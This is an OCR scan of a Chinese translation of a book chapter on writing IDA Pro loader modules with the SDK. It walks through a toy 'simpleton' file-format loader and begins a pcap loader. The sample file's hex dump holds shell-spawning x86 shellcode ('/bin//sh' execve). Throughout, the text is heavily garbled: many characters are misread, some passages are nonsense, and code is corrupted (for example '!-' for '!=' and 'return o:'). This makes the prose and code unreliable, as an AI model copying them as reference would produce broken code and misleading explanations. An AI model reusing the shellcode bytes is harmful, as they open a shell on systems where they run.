如 果 一 个 文件 以 二 进 制 模式 加 载 ，IDA 不 会 自动 分 析 这 个 文件 的 内 容 。 此 外 ，IDA 也 不 会 设 
法 确定 创建 该 文件 所 使 用 的 编译 器 和 该 文件 导入 的 库 和 函数 , 也 不 会 自动 在 数据 库 中 加 载 类 型 库 
或 签名 信息 。 你 很 可 能 需要 做 大 量 的 工作 ， 才 能 生成 一 个 和 IDA. 自动 生成 的 反 汇 编 代码 清单 类 
似 的 代码 清单 。 实 际 上， 我 们 甚至 还 没有 触及 PE 头 部 的 其 他 方面 ， 以 及 如 何 将 这 些 额外 的 信息 
合并 到 我 们 的 手动 加 载 过 程 中 。 

在 结束 关于 手动 加 载 的 讨论 之 前 ， 想 象 一 下 ， 每 次 你 打开 IDA 无 法 识别 的 同一 类 格式 的 二 
进 制 文件 时 ， 你 都 需要 重复 本 节 讨 论 的 每 一 个 步骤 。 以 后 你 可 能 会 选择 编写 IDC 脚本 ， 帮 助 你 
执行 一 些 头 部 解析 和 段 创建 任务 ， 对 你 的 一 些 操 作 进 行 自 动 化 。 这 正 是 我 们 创建 IDA Jd as t 
块 的 动机 所 在 ， 也 是 加 载 需 模块 的 用 途 所 在 ， 我 们 将 在 下 一 节 中 讨论 DA 加 载 咒 模块 。 
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IDA 使 用 加 载 需 模块 执行 一 项 乏味 的 工作 : 创建 新 数据 库 的 初始 布局 。 当 用 户 选 择 打 开 一 个 
新 的 二 进 制 文件 时 ， 就 要 用 到 加 载 硕 。 加 载 硕 的 工作 包括 : 将 输入 文件 读 取 到 新 建 的 数据 库 中 ， 
根据 输入 文件 的 结构 创建 节 ,， 组 织 数 据 库 的 布局 ， 然 后 将 控制 权 转 交 给 处 理 需 模块 ， 由 后 者 执行 
与 反 汇 编 有 关 的 任务 。 创 建 数据 库 后 ，IDA 将 调用 初始 加 载 融 中 的 特殊 另 数 ， 以 移动 数据 库 段 和 
生成 EXE 文件 (File » Produce File » Create EXE File )。 
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一 旦 用 户 选 择 打开 一 个 新 的 可 执行 文件 , 加 载 过 程 将 立即 开始 (加 载 柄 并 不 用 于 加 载 现 有 的 
数据 库 )。 和 插件 一 样 ， 加 载 右 以 共享 库 组 件 的 形式 构建 。 和 插件 一 样 ， 我 们 可 以 使 用 IDASDK 
以 共享 库 组 件 的 形式 构建 加 载 融 。 加 载 顶 是 第 一 种 能 够 使 用 脚本 (在 IDA 5.6 中 引入 ) 实 施 的 IDA 
扩展 模块 。 

选择 一 个 二 进 制 文件 后 , IDA 将 加 载 <IDADIR>/loaders 目录 中 的 每 一 个 加 载 右 模块 ,并 要 求 
每 个 模块 分 析 该 文件 。 能 够 识别 新 文件 的 格式 的 所 有 加 载 融 将 在 “文件 加 载 ” 对 话 框 中 列 出 ， 然 
后 ， 由 用 户 决定 使 用 哪 一 个 加 载 需 加 载 这 个 文件 。 
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IDA 通过 每 个 加 载 器 必须 声明 和 导出 的 全 局 loader t 对 象 访问 加 载 器 模块 。1o0ader t 结构 
体 类 似 于 所 有 插件 模块 使 用 的 plugin t 28. f£ loader.hpp 中 定义 的 loader t 结构 体 的 布局 如 下 
面 的 代码 清单 所 示 。 

struct loader t { 


ulong version; // api version, should be IDP INTERFACE VERSION 
ulong flags; // loader flags 





//check input file format. if recognized, 
int (idaapi *accept file)(linput t *li, 
char fileformatname[MAX FILE FORMAT NAME], 
int n); 
//load file into the database. 
void (idaapi *load file)(linput t *li, ushort neflags, 
const char *fileformatname); 


//cxreate output file from the database, this function may be absent. 
int (idaapi *save file)(FILE *fp, const char *fileformatname); 


//take care of a moved segment (fix up relocations, for example) 
//this function may be absent. 
int (idaapi *move segm)(ea t from, ea t to, asize t size, 
const char *fileformatname); 


//initialize user configurable options based on the input file. 
//Called only when loading is done via File-»New, not File-»O0pen 
//this function may be absent. 

bool (idaapi *init loader options)(linput t *li); 

n 


fil plugin t 类 一 样 ，10ader tt 对象 的 行为 由 它 的 成 员 指 癌 的 函数 C EH DER Ex BIER ) XE 
义 。 每 个 加 载 需 必须 导出 一 个 名 为 LDSC( 指 加 载 妖 说 明 ) 的 loader t 对象。loader.hpp 文件 负 
责 导 出 LDSC 对 象 ， 然 后 由 你 声明 和 初始 化 。 需 要 注意 的 是 ， 有 几 个 函数 接受 一 个 1input t ( 指 
加 载 需 输入 类 型 ) 类 型 的 输入 参数 。1input t 是 一 个 内 部 SDK 类 ， 它 为 C 标 准 FILE 类 型 提供 
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AMAR ML ll Se JJ 1input t 执行 标准 输入 操作 的 函数 在 diskio.hpp 中 声明 。 

要 成 功 创建 加 载 带 , 你 必须 正确 初始 化 LDSC 对 象 。 下 面 简要 说 明 这 个 对 象 的 每 个 成 员 的 作用 。 

O versions 这 个 成 员 的 作用 和 plugin t 类 中 的 version 成 员 的 作用 相同 。 请 参阅 第 17 章 中 
对 它 的 描述 。 

O flags。 加 载 莫 识别 的 唯一 一 个 标志 为 LDRF RELOAD， 该 标志 在 loader.hpp 中 定义 。 对 许多 
加 载 融 来 说 ， 把 这 个 字段 赋 信 为 零 就 够 了 。 

O accept file。 这 个 函数 的 作用 是 为 新 选择 的 输入 文件 提供 基本 的 识别 功能 。 这 个 函数 应 
利用 所 提供 的 1input t 对 象 ， 从 一 个 文件 中 谈 取 足够 的 信息 ， 以 决定 加 载 融 是 否 能 够 解 
析 该 文件 。 如 采 该 冰 数 能 够 识别 这 个 文件 ， 加 载 融 应 将 文件 格式 名 称 复制 到 file- 
formatname 输出 绥 神 区 中 。 如 末 无 法 识别 文件 格式 ， 这 个 函数 应 返回 0; 如 果 它 能 够 识别 
文件 格式 , 则 返回 非 零 值 。 用 ACCEPT FIRST 标志 对 返回 值 进行 OR 处 理 , 可 要 求 IDA 在 文 
件 加 载 对 话 框 中 首先 列 出 这 个 加 载 咒 。 如 果 几 个 加 载 器 都 标 有 ACCEPT FIRST， 则 首先 列 
出 最 后 查询 的 加 载 硕 。 

O load file。 这 个 成 员 是 另 一 个 函数 指针 。 如 采用 户 选 择 用 你 的 加 载 硕 加 载 新 选择 的 文件 ， 
IDA 将 调用 相关 联 的 函数 。 这 个 函数 接受 一 个 应 被 用 于 谈 取 所 选 文件 的 1input 七 对 象 。 
neflags 参数 包含 对 在 loader.hpp 中 定义 的 各 种 NEF XXX 标志 的 按 位 Op 操作 。 这 其 中 的 
几 个 标志 反映 了 文件 加 载 对 话 框 中 各 种 复 选 框 设置 的 状态 。1o0ad file 因数 负责 执行 必 
需 的 任务 ， 如 解析 输入 文件 内 容 ， 加 载 和 映射 一 些 或 全 部 文件 内 容 到 新 建 的 数据 库 中 。 
如 果 发 现 一 个 无 法 修复 的 错误 条 件 ，1oad file 应 调用 loader failure， 终 止 加 载 过 程 。 

O save files 这 个 成 员 选 择 性 地 指 问 一 个 函数 , 该 函数 能 够 啊 应 File ^ Produce File ^ Create 
EXE File 命令 , 生成 一 个 EXE Ch. RE. "EXE" AENA, 因为 执行 save file 
可 以 生成 你 想 要 的 任何 类 型 的 文件 。 由 于 加 载 带 负责 将 一 个 文件 映射 到 数据 库 中 ， 它 应 
该 也 能 够 将 这 个 数据 库 映 射 到 原来 的 文件 中 。 实 际 上 ， 加 载 顶 并 没有 从 初始 输入 文件 中 
加 载 足够 的 信息 来 根据 数据 库 内 容 生 成 一 个 有 歼 的 输出 文件 。 例 如 ，IDA 目 市 的 PE 文件 
加 载 器 无 法 由 一 个 数据 库 文件 重新 生成 一 个 EXE 文件。 如 果 你 的 加 载 融 不 能 生成 输出 文 
件 ， 那 么 ， 你 应 该 将 save file 成 员 设置 为 NULL。 

O move segm。 这 个 成 员 是 一 个 指向 函数 的 指针 ， 当 用 户 尝 试 移动 数据 库 中 一 个 使 用 这 个 加 
载 硕 加 载 的 段 时 ，IDA 将 调用 该 函数 。 由 于 加 载 硕 可 能 知道 原始 二 进 制 文件 中 包含 的 重 
定位 信息 ， 因 此 ， 在 移动 段 时 ， 这 个 冰 数 可 能 会 考虑 到 重 定位 信息 。 这 个 函数 是 可 选 的 ， 
如 果 不 需 要 这 个 子 数 ( 例如， 如 有 果 在 这 种 文件 格式 中 没有 重 定 位 或 修复 地 址 )， 则 该 指针 
应 设置 为 NULL 

O init loader options。 这 个 成 员 是 一 个 指 问 消 数 的 指针 , 该 函数 用 于 通过 File ^ New 命令 
完成 的 基于 回 导 的 加 载 过 程 ， 设 置 用 户 指定 的 选项 。 此 函数 只 能 在 IDA 的 Windows 本 机 
GUI 版 本 (idag ) 中 使 用 , 因为 该 版 本 是 唯一 提供 这 些 疝 导 的 IDA 版 本 。 在 调用 load file 
之 前 ,一旦 用 户 选 择 一 个 加 载 锅 ， 这 个 函数 即 被 调用 。 如 果 在 调用 load file 之 前 , 不 需 
要 对 加 载 锅 进行 配置 ， 那 么 ， 你 完全 可 以 将 这 个 成 员 指 针 设 置 为 NULL。 
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init loader options 消 数 值得 我 们 额外 说 明 。 需 要 记 住 的 是 ， 如 有 果 使 用 File 》 Open 命令 打 
开 一 个 文件 ， 这 个 孔 数 绝 不 会 被 调用 。 在 更 加 复杂 的 加 载 带 (如 IDA 的 PE IAr) F, xc PR 
数 用 于 初始 化 基于 XML Br] Se, 这 个 癌 导 帮助 用 户 完 成 整个 加 载 过 程 。 <IDADIR>/cfg 目录 保存 
了 几 个 这 类 向 导 的 XML 模板 。 但 是 ， 除 了 现 有 的 模板 外 ， 没 有 文档 资料 说 明 如 何 创建 你 自己 的 
问 导 模板 。 

在 本 半 的 和 镜 余 部 分 ， 我们 将 开发 两 个 示例 加 载 融 ， 以 分 析 一 些 常 用 的 加 载 右 操作 。 


18.4.1 “傻瓜 式 ” 加 载 器 


为 了 说 明 IDA 加 载 融 的 基本 操作 ， 我 们 引入 一 个 完全 虚拟 的 “傻瓜 式 ”文件 格 式 ， 它 由 下 
面 的 C £p ee SC (MAER tcr 8 US ): 








struct simpleton { 
uint32 t magic; //simpleton magic number: Ox1DABOOC 
uint32 t size; //size of the code array 
uint32 t base; //base virtual address and entry point 
uint8 t code[size]; //the actual program code 


e 


这 个 文件 的 格式 非 沼 简单: rt VC ker ET RUP TE VC ITU ET. 后 面 是 文件 中 
的 所 有 代码 。 这 个 文件 从 code 块 的 第 一 个 字 节 开始 执行 。 
一 个 小 型 “傻瓜 式 ”文件 的 十 六 进 制 代码 如 下 所 未: 





0000000: OcbO da01 4900 0000 0040 0000 31c0 5050 ....I....@..1.PP 
0000010: 89e7 6a10 5457 50bO f350 cd91 5859 4151 ..j.TWP..P..XYAO 
0000020: 50cd 9166 817f 0213 8875 f16a 3e6a 025b P..f.....u.j»j.[ 
0000030: 5853 6209 516a 3ecd 914b 79f4 5068 6e2f XSj.0j»..Ky.Ph// 
0000040: 7368 682f 2f62 6989 e350 5389 e150 5153 shh/bin..PS..POS 
0000050: bo3b 50cd 91 EE 


SDK 提供 了 几 个 样本 加 载 器 ， 它 们 位 于 <SDKDIR>/ldr 目录 中 。 我 们 选择 在 样本 加 载 器 目录 
下 的 子 上 日 录 中 构建 加 载 咽 ， 这 里 我 们 使 用 <SDKDIR>/ldr/simpleton。 加 载 器 采用 以 下 设置 : 


#include "../idaldr.h" 
#define SIMPLETON MAGIC Ox1DABOOC 





struct simpleton { 
uint32 t magic; //simpleton magic number: Ox1DABOOC 
uint32 t size; //size of the code array 
uint32 t base; //base virtual address and entry point 


kb 


SDK 自 带 的 idaldrh 头 文件 (<SDKDIR>/ldr/idaldr.h ) 是 一 个 便捷 文件 ， 其 中 包含 其 他 几 个 
头 文件 ， 并 定义 了 几 个 宏 ， 它们 常常 用 在 加 载 厦 模块 中 。 
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下 一 步 是 声明 所 需 的 LDSC 对 象 ， 它 指 疝 各 种 实现 加 载 带 行为 的 函数 : 


int idaapi accept simpleton file(linput t *, char[MAX FILE FORMAT NAME], int); 
void idaapi load simpleton file(linput t *, ushort, const char *); 
int idaapi save simpleton file(FILE *, const char *); 


loader t LDSC = { 
IDP INTERFACE VERSION, 
0, // loader flags 
accept simpleton file, // test simpleton format. 
load simpleton file, // load file into the database. 


save simpleton file, // simpleton is an easy format to save 
NULL, // no special handling for moved segments 
NULL, // no special handling for File-»New 

n 





BE Polk, RME RIH BEP dif a oT JI Roa Pr ROB PR, Plone accept simpleton 
loader PAX: 


int idaapi accept simpleton file(linput t *li, 
char fileformatname[MAX FILE FORMAT NAME], int n) { 
uint32 magic; 
if (n || Ireadabytes(li, &magic, false)) return 0; 
if (magic !- SIMPLETON MAGIC) return o:  //bad magic number found 
qsnprintf(fileformatname, MAX FILE FORMAT NAME, "Simpleton Executable"); 
return 1; //simpleton format recognized 


j 


这 个 函数 的 唯一 目的 是 判断 被 打开 的 文件 是 否 是 一 个 “傻瓜 式 ” 文 件 。 参 数 n 是 一 个 计数 
Zë. CA] accept file 函数 在 当前 的 加 载 过 程 中 被 调用 的 次 数 。 通 过 使 用 这 个 参数 ， 加 载 吉 
将 能 够 识别 多 种 相关 文件 格式 。IDA 将 用 递增 的 n 值 调用 accept. file 哨 数 ， 直 到 该 函数 返回 
0。 对 于 加 载 器 识别 的 第 一 种 特殊 格式 ， 你 应 填 人 fileformatname 数组 并 返回 非 零 值 。 这 里 ， 
我 们 通过 立即 返回 0, 忽略 除 第 一 次 调用 CHAISE n 为 0) 以 外 的 其 他 调用 。 在 diskio.hpp 中 定义 
的 1read4bytes 咀 数 用 于 读 取 4 字 市 幻 数 ,如 果 成 功 读 取 到 幻 数 ,这 个 函数 将 返回 0,1read4bytes 
国 数 的 一 个 有 用 特性 在 于 它 能 够 根据 它 的 第 三 个 布尔 参数 的 值 ， 以 大 端 或 小 端 顺 序 读 取 字 节 
(EX false 则 读 取 小 问 , EW true MERKI ), 这 个 特性 有 助 于 我 们 减少 调用 在 加 载 过 程 中 
所 需 的 字 节 交换 孔 数 的 次 数 。 如 果 已 经 确定 所 需 幻 数 的 位 置 ,那么 最 后 ,accept simpleton file 
商 数 会 将 文件 格式 的 名 称 复制 到 fileformatname 输出 参数 中 ， 然 后 返回 1， 表 示 已 识别 文件 
格式 。 

对 “傻瓜 式 ” 加 载 器 而 言 ,， 如果 用 户 选 择 使 用 File 》 New 而 非 File » Open 加 载 一 个 “傻瓜 式 ” 
文件 ， 那么 不 需要 任何 特殊 人 处理 ， 也 就 不 需要 使 用 init loader options 也 数 。 因 此 ， 下 一 个 被 
调用 的 函数 将 是 1oad simpleton file， 如 下 所 示 : 
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void idaapi load simpleton file(linput t *li, ushort neflags, const char *) { 
simpleton hdr; 
//read the program header from the input file 
lread(li, &hdr, sizeof(simpleton)); 
//load file content into the database 
file2base(li, sizeof(simpleton), hdr.base, hdr.base + hdr.size, 
FILEREG PATCHABLE); 
//create a segment around the file's code section 
if (ladd segm(0, hdr.base, hdr.base + hdr.size, NAME CODE, CLASS CODE)) { 
loader failure(); 
} 
//retrieve a handle to the new segment 
segment t *s - getseg(hdr.base); 
//so that we can set 32 bit addressing mode on (x86 has 16 or 32 bit modes) 
set segm addressing(s, 1); //set 32 bit addressing 
//tell IDA to create the file header comment for us. Do this 
//only once. This comment contains license, MD5, 
// and original input file name information. 
create filename cmt(); 
//Add an entry point so that the processor module knows at least one 
/laddress that contains code. This is the root of the recursive descent 
//disassembly process 
add entry(hdr.base, hdr.base, " start", true); 


j 


加 载 带 的 load file pp HL rue TAE. dE IB RIRE” An AT VA MES -o 

(1) 使 用 diskio-hpp 中 的 1read KRUA vk "(GI dn read 函数 非 党 类似 于 POSIX 
read DÉEN. 

(2) 使 用 loader.hpp 中 的 file2base Pë VC ErP B V3 8 JH s SUPCR FE rn Br) 3s 2 E as T] o 

(3) 使 用 segment.hpp 中 的 add. segm RAŽE et— 9G PE Br, Hove oT) SE o 

(4) 通过 调用 segment.hpp 中 的 getseg 和 set. segm addressing 函数 ， 为 我 们 的 新 代码 段 指 定 
32 位 寻 址 。 

(5) 使 用 loader.hpp 中 的 create filename cmt 函数 生成 一 段 数据 库 头 部 注释 。 

(6) 使 用 entry.hpp 中 的 add. entry 图 数 添 加 一 个 程序 人 口 点 ， 为 处 理 需 模块 的 反 汇 编 过 程 提 
供 一 个 起 点 。 

对 加 载 融 而 言 ，file2base 是 一 个 “主力 ”函数 ， 它 的 原型 如 下 所 示 : 





int ida export file2base(linput t *li, long pos, ea t eat, ea t ea2, int patchable); 


这 个 函数 从 所 提供 的 Tinput t 中 读 取 字 节 ，1input t 以 pos 指定 的 文件 位 置 为 起 始 地 址 。 
这 些 字 节 被 加 载 到 数据 库 中 地 址 eal 与 ea2 (不 包括 ea2 ) 之 间 的 空间 中 。 所 读 取 的 总 字 节 数 由 
ea2-eal 计算 得 出 。patchable 参数 指明 IDA 是 否 应 维护 文件 偏 移 量 与 它们 在 数据 库 中 的 对 应 位 
置 之 间 的 内 部 映射 。 要 维护 这 样 一 个 映射 , 应 将 这 个 参数 设置 为 FILEREG_PATCHABLE,， 以 生成 IDA 
的 .dif 文 件 ， 如 第 14 章 所 述 。 
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add entry 因 数 是 加 载 过 程 中 另外 一 个 重要 的 图 数 。 反 汇编 过 程 只 能 从 已 知 包含 指令 的 地 址 
开始 。 通 常 ， 对 递归 下 降 反 汇编 带 来 说 ， 通 过 解析 一 个 文件 的 入 日 点 (如 导出 荫 数 )， 即 可 获得 
这 类 地 址 。add_entry 函数 的 原型 如 下 所 示 : 


bool ida export add entry(uval t ord, ea t ea, const char *name, bool makecode); 








参数 ord 供 按 序 号 〈 而 不 仅 是 函数 名 ) 导出 的 导出 函数 使 用 。 如 有 果 入 口 点 没有 相关 的 序号 ， 
应 设置 ord 使 用 和 ea 参数 相同 的 值 。ea 参数 指定 入 口 点 的 有 效 地 址 ， 而 name 参数 则 指定 与 入 口 
点 有 关 的 名 称 。 通常 ,IDA 会 对 程序 的 初始 执行 地 址 使 用 符号 名 称 _start。 布尔 型 makecode 参数 
规定 是 CE) 否 ( 假 ) 将 指定 的 地 址 作为 代码 处 理 。 导 出 的 数据 项 ( 如 加 载 带 模块 中 的 LSDC ) 就 
属于 非 代 人 码 进 入 后 。 

在 “ 俊 瓜 式 ” 加 载 太 中 ， 我 们 执行 的 最 后 一 个 函数 是 save_simpleton_file， 它 用 于 根据 数 
据 库 内 容 创 建 一 个 “傻瓜 式 ” 文 件 。 执 行 过 程 如 下 所 示 : 

















int idaapi save simpleton file(FILE *fp, const char *fileformatname) { 
uint32 magic = SIMPLETON MAGIC; 
if (fp == NULL) return 1;  //special case, success means we can save files 
segment t *s = getnseg(0); //get segment zero, the one and only segment 


if (s) A 
uint32 sz - s-»endEA - s-»startEA; //compute the segment size 
qfwrite(fp, &magic, sizeof(uint32)); //write the magic value 
qfwrite(fp, 8sz, sizeof(uint32)); //write the segment size 


qfwrite(fp, &s-»startEA, sizeof(uint32)); //write the base address 
base2file(fp, sizeof(simpleton), s-»startEA, s-»endEA); //dump the segment 
return 1; //return success 


} 
else { 
return 0; //return failure 
} 
} 


loader t 的 save file 函数 接受 一 个 FILE 流 指 针 fp, save file PRU Ie] HR ET ALTI 
输出 。fileformatname 参数 的 名 称 与 加 载 器 的 accept file 函数 的 参数 的 名 称 相同 。 如 前 所 述 ， 
调用 save file KC, Ey f nw IDA 的 File » Produce File » Create EXE File 命令 。 为 了 啊 应 这 
个 命令 ， 最 初 ，IDA 会 调用 save file mäi. FH fp 设置 为 NULL。 如 果 以 这 种 方式 被 调用 ， 
save file 图 数 将 接受 查询 , 以 确定 它 是 否 能 够 生成 fileformatname 指定 的 输出 文件 类 型 。 这 时 ， 
如 果 save file 无 法 创建 指定 的 文件 类 型 ， 它 应 返回 0; BU, CMRE 1。 例 如 ， 只 有 在 数据 
库 中 存在 特定 的 信息 时 ， 加 载 硕 才能 创建 一 个 有 歼 的 输出 文件 。 

如 果 使 用 有 效 的 ( 非 NULL ) FILE 指针 调用 ，save_file 应 将 一 个 有 效 的 输出 文件 写 
入 到 所 提供 的 FILE 流 中 。 遇 到 这 类 情况 ， IDA 将 在 向 用 户 显示 “保存 文件 ”对 话 框 后 创建 
FILE Yes 
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IDA 和 FILE 指针 


(DOUD DUU Windowsi UU DAU ODOL tpronUOUDUIDAFLEEDUODUDDUDODO 
(DUUDDUUDUDDUDUDUDUDU DAN TI E] DEE——ida wll.di O O Borland[] [I 
OE E o E o E o E E a E a BedandFILE[] LH T] DD HL BL O HEB D DEO C LI C] 
(DUU IDADDDHBOBOBUOBUOIDATL] qox] O qfprintf[] O fpro.hO LL BD D EI D] 
EL E E a E EIE BTE EU D D'DP EE COD OD D gems ELE [EDI IBI BI BE 0 
可 
OE O a E TEI TET OI: CDD. RED: H BETIS TB IHE ELLE ELE BEI 

oD fpro.h[] LJ [1 BJ E BS E] EJ E] EJ E] DJ E] ED] USE STANDARD FILE FUNCTIONS UI 

atii CDU FIE[LOUT UD IDAD [] E] FIEEL] UI 

alui IDA[] atbx»«t Ht B d eoi FILELDIL L 


回 到 save simpleton file mër. (CC save file BgJJBEBT, "E— CIE FH] KAUGE 
base2file 函数 ， 它 与 我 们 在 load simpleton file 中 使 用 的 file2base 函数 相对 应 。base2file 
为 数 只 是 将 一 系列 数据 库 值 写 人 到 所 提供 的 一 个 FILE 流 中 的 指定 位 置 。 

虽然 “傻瓜 式 ” 文 件 格式 几乎 没有 任何 用 处 , 但 它 可 用 于 一 个 目的 : 我 们 可 通过 它 展 示 IDA 
加 载 硕 模块 的 核心 功能 。 该 “傻瓜 式 ” 加 载 硕 的 源 代 码 可 在 本 书 网 站 上 找到 。 


18.4.2 构建 IDA 加 载 器 模块 


除了 一 些 细微 的 差别 外 , 构建 和 安装 DA 加 载 融 模块 的 过 程 与 第 17 章 讨 论 的 构建 IDA 插件 
模块 的 过 程 几乎 完全 相同 ,首先 , Windows 和 Liunx 平台 使 用 的 加 载 需 文件 扩展 名 分 别 为 .ldw/.164 
和 .llx/.llx64。 其 次 ， 在 构建 加 载 磊 时， 我 们 将 新 建 的 加 载 天 存储 在 <SDKDIR>/bin/loaders 目录 中 
(这 属于 个 人 喜好 )。 最 后 ， 通 过 将 已 编译 的 加 载 需 二 进 制 文件 复制 到 <IDADIR>/loaders 目录 中 ， 
我 们 可 以 安装 加 载 右 模块 。 对 代码 清单 17-1 中 的 生成 文件 稍 作 修改 ， 将 PLUGIN EXT 变量 更 改 为 
一 个 反映 正确 的 加 载 器 文件 扩展 名 的 LOADER EXT 变量 , 将 idabook plugin 的 全 部 引用 更 改 为 
simpleton, 使 OUTDIR 变量 指向 $(IDA)/bin/1oaders， 即 可 用 修改 后 的 生成 文件 构建 “傻瓜 式 ” 加 
ERAF o 




















18.4.3 IDA pcap 加 载 器 


可 以 说 ， 绝 大 多 数 网 络 数据 包 并 不 包含 可 被 反 汇编 的 代码 。 但 是 ， 如 末 一 个 数据 包 磁 巧 包 
含 一 个 破解 程序 的 证 据 , 那么 该 数据 包 可 能 包含 需要 进行 反 汇 编 C 以 对 数据 包 进 行 准确 的 分 析 ) 
的 二 进 制 代码 。 为 了 证 明 IDA 加 载 囊 可 以 用 于 多 种 用 途 ， 现 在 我 们 描述 如 何 创建 一 个 能 够 将 
pcap 格式 的 数据 包 捕获 文件 加 载 到 YD A. 数据 库 中 的 加 载 器 。 虽 然 这 样 做 可 能 有 点 小 题 大 做 , 但 





D 参见 http://www.tcpdump.org/。 
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是 ， 我 们 将 逐渐 证 实 IDA SDK 的 其 他 一 些 功能 。 在 这 里 ， 我 们 不 会 匹配 Wireshark 之 类 的 工具 
的 功能 。 

开发 这 种 加 载 磊 需要 我 们 对 pcap 文件 格式 有 一 是 的 研究 。 人 研究 表明 ，pcap 文件 由 以 下 简单 
的 场 法 构成 : 








pcap file: pcap file header (pcap packet)* 
pcap packet: pcap packet header pcap content 
pcap content: (byte)+ 


pcap file header 包含 一 个 32 位 幻 数字 段 和 描述 文件 内 容 的 其 他 字段 ,包括 文件 所 包含 的 
数据 包 的 类 型 。 为 了 简化 ， 这 里 假设 仅 处 理 DLT ENIOMB ( 10Mb 以 太 网 数据 包 )。 在 开发 pcap 
加 载 锅 的 过 程 中 ,我 们 的 一 个 目标 是 识别 尽 可 能 多 的 头 部 数据 ， 以 帮助 谈 者 集中 精力 处 理 数据 
包 内 容 ， 特 别 是 应 用 层 的 内 容 。 要 完成 这 个 目标 ， 首 先 需要 为 每 一 个 文件 头 部 创建 一 个 单独 的 
段 ， 将 它们 与 数据 包 分 离开 来 ; 然后 再 从 每 个 段 中 识别 出 尽 可 能 多 的 头 部 结构 体 ， 以 便 用 户 不 
需要 手动 解析 文件 内 容 。 下 面 的 讨论 将 主要 集中 于 pcap IMZA load file 组 件 , 因为 这 里 的 
accept file 函数 只 是 对 accept simpleton file 进行 了 简单 的 修改 ， 使 它 能 够 识别 pcap 幻 数 
即 可 。 

为 了 识别 头 部 结构 体 ， 在 加 载 过 程 中 ， 我 们 需要 在 IDA 的 “结构 体 ” 窗 口中 定义 一 些 党 用 
的 结构 体 。 这 样 ， 如 果 已 知 一 些 字 节 的 数据 类 型 ， 加载 右 将 自动 把 它们 格式 化 成 结构 体 。IDA 的 
GNU C++ Unix 类 型 库 定 义 了 pcap 头 部 结构 体 和 各 种 描述 以 太 网 、 了 下、TCP 和 UDP 头 部 的 、 与 
网 络 有 关 的 结构 体 。 但 是 , Æ IDA 5.3 之 前 的 版 本 中 ， 对 卫 头 部 结构 体 〈iphdr ) 的 定义 并 不 正 
确 。1oad pcap_file 采取 的 第 一 个 步骤 是 调用 我 们 编写 的 一 个 名 为 add. types 的 帮助 函数 , 将 结 
构 体 导入 到 新 数据 库 中 。 共 有 两 个 版 本 的 add_types， 其 中 一 个 版 本 使 用 了 在 IDA 的 GNU C++ 
Unix 类 型 库 中 声明 的 类 型 ， 男 一 个 版 本 则 自己 声明 全 部 所 需 的 结构 体 。 

第 一 个 版 本 的 add types 首先 加 载 GNU C++ Unix 类 型 库 ， 然 后 从 这 个 新 加 载 的 类 型 库 中 提 
取出 类 型 标识 从 。 这 个 版 本 的 add types 如 下 所 示 : 


















































void add types() { 
#ifdef ADDTIL DEFAULT 
add til2("gnuunx.til", ADDTIL SILENT); 
#else 
add til("gnuunx.til"); 
#endif 
pcap hdr struct = til2idb(-1, "pcap file header"); 
pkthdr struct = til2idb(-1, "pcap pkthdr"); 
ether struct = til2idb(-1, "ether header"); 
ip struct = til2idb(-1, "iphdr"); 
tcp struct = til2idb(-1, "tephdr")s 
udp struct = til2idb(-1, "udphdr"); 
} 


D 参见 http://www.wireshark.org/。 





290 $183 ”二进制 文件 与 IDA 加 载 器 模块 


在 typinf.hpp 中 定义 的 add til 函数 用 于 将 一 个 现 有 的 类 型 库 文件 加 载 到 数据 库 中 。 为 了 支 
持 随 IDA 5.1 版 本 引入 的 add ti12 函数 ， 使 用 add til 函数 的 做 法 遭 到 反对 。 这 些 SDK PR CTS 
功能 等 同 于 第 8 章 中 讨论 的 使 用 “类 型 ”窗口 加 载 一 个 . 包 文件 。 加 载 一 个 类 型 库 后 ， 就 可 以 利 
用 til2idb 因数 将 各 个 类 型 导 和 人 到 当前 数据 库 中 。 这 种 编程 操作 等 同 于 第 8 章 中 讨论 的 将 一 个 标 
准 结构 体 添加 到 “结构 体 ” 窗 口中 。ti12idb 因数 返回 一 个 类 型 标识 符 ， 在 我 们 希望 将 一 系列 字 
节 转 换 成 特定 的 结构 体 数据 类 型 时 , 会 用 到 这 个 标识 符 。 我 们 已 经 将 这 些 类 型 标识 符 保 存在 全 局 
变量 (tid t 类 型 ) 中 ， 以 便 在 后 面 的 加 载 过程 中 更 快 地 访问 各 种 类 型 。 

第 一 个 版 本 的 add types 存在 两 个 缺点 。 第 一 ， 仅 仅 为 了 访问 6 种 数据 类 型 ， 我 们 需要 导入 
整整 一 个 类 型 库 。 第 二 ， 如 前 所 述 ，IDA 对 于 IP 头 部 结构 体 的 内 建 定义 并 不 正确 ， 因 此 ， 在 后 
面 的 加 载 过 程 中 ， 如 果 尝 试 应 用 这 些 结构 体 ， 可 能 会 导致 问题 。 

第 二 个 版 本 的 add. types 说 明 如 何 通 过 解析 C 风格 的 结构 体 声 明 ,动态 创建 一 个 类 型 库 。 这 
个 版 本 如 下 所 示 : 














void add types() { 
til t *t = new til("pcap.til", "pcap header types"); //empty type library 
parse decls(t, pcap types, NULL, HTI PAK1); //parse C declarations into library 
sort til(t); //required after til is modified 
pcap hdr struct - import type(t, -1, "pcap file header"); 
pkthdr struct = import type(t, -1, "pcap pkthdr"); 
ether struct - import type(t, -1, "ether header"); 
ip struct = import type(t, -1, "iphdr"); 


tcp struct = import type(t, -1, "tcphdr"); 
udp struct - import type(t, -1, "udphdr"); 
free til(t); //free the temporary library 


j 


这 个 版 本 的 add types 使 用 new til 函数 创建 了 一 个 临时 的 空 类 型 库 。 它 通过 解析 一 个 包含 
4X C 结构 体 定义 的 字符 串 ( pcap types )， 获 得 加 载 融 所 需 的 类 型 ， 从 而 填充 新 的 类 型 库 。 
pcap types 字符 串 的 前 几 行 代码 如 下 所 示 : 





char *pcap types = 

"struct pcap file header {\n" 
"int magic; Nn" 
"short version major; Nn" 
"short version minor; n" 
"int thiszone;'n" 
"int sigfigs;Nn" 
"int snaplen; Wn" 
"int linktype; Nn" 

JM 


pcap types 还 声明 了 其 他 内 容 ， 包 括 pcap 加 载 需 所 需 的 全 部 结构 体 的 定义 。 为 了 简化 解析 
过 程 ， 我 们 选择 更 改 结构 体 定 义 中 的 所 有 数据 声明 ， 以 利用 标准 的 C 数据 类 型 。 


18.4 使 用 SDK 编写 IDA Jn dx, 25 291 


HTI_PAK1 常量 在 typeinf.hpp 中 定义 , 是 用 于 控制 内 部 C 解 析 需 行为 的 许多 HTI_XXX 值 中 的 一 
个 ,在 这 个 例子 中 ,代码 请 求 的 是 1 字 节 对 齐 的 结构 体 , 经 过 修改 后 , 这 个 类 型 库 将 使 用 sort til 
